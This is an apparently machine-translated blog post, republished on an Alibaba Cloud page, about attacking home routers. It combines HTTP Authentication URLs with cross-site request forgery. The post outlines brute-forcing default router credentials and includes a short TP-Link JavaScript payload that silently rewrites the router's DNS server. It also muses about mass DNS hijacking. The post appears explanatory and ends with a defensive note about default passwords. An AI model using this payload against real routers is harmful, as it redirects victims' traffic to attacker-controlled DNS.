Http Authentication Url and csrf = Router Hacking

Source: Internet
Author: User
Tags http authentication

First, let's briefly describe what is Http Authentication. The server returns a 401 status and a WWW-Authenticate header.

 

The WWW-Authenticate header contains descriptions of the Http Authentication box, such

 

Enter the user name and password in the authentication box and put the password in the Authorization Header for sending

YWRtaW46YWRtaW4 = is the base64 encoding of admin: admin

 

Http Authentication, in fact, supports accessing and logging in the form of Http Authentication Url in all browsers earlier, that is

Http: // user: password @ url

To prevent phishing URLs, Microsoft has released a security patch to disable Http Authentication URLs. For details, see

Http://support.microsoft.com/kb/834489

 

After the popularization of science, let's look at some of the previous things. In the past few years, I have seen several cases of overseas black routes. Among them, flash upnp attack is a wonderful one, the port of the specified IP address in the Intranet is mapped out for attack. Of course, some Routing Vulnerabilities can also map out the WEB Management port of the route for attack, FLASH later fixed the security vulnerability.

 

Back to the question, we know that most domestic home routes use the Http Authentication method. For example, TPLINK routing is used, although IE disables the Http Authentication Url, however, firefox, chrome, and other browsers support Http Authentication URLs,At the same time, embedding the Http Authentication Url in the form of tags can force successful Http Authentication without any security promptSo an evil attack method came.

 

1. We can use the default IP address and default password of various routes in China to construct an Http Authentication Url brute force login script.

2. Use CSRF to modify the DNS of the route and direct it to our malicious DNS.

 

For example, the following tplink demo:

<Script>
Function dns (){
Alert ('I have changed your dns on my domain! ')
I = new Image;
I. src = 'HTTP: // 192.168.1.1/userRpm/LanDhcpServerRpm.htm? Dhcpserver = 1 & ip1 = 192.168.1.100 & ip2 = 192.168.1.199 & Lease = 120 & gateway = 0.0.0.0 & domain = & dnsserver = 8.8.8.8 & dnsserver2 = 0.0.0.0 & Save = % B1 % A3 + % B4 % E6 ';
}

</Script>


After tplink.html!

 

Secretly join a DNS server named 8.8.8.8!

 

How can a hacker use this attack to launch a large-scale attack? Tens of thousands of routes are silently modified to the DNS?

This is a common security issue. Do you have modified the default password for your vro? Fortunately, only firefox, chrome, and other browsers have such security issues.

 

From: RAyh4c Black Box

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.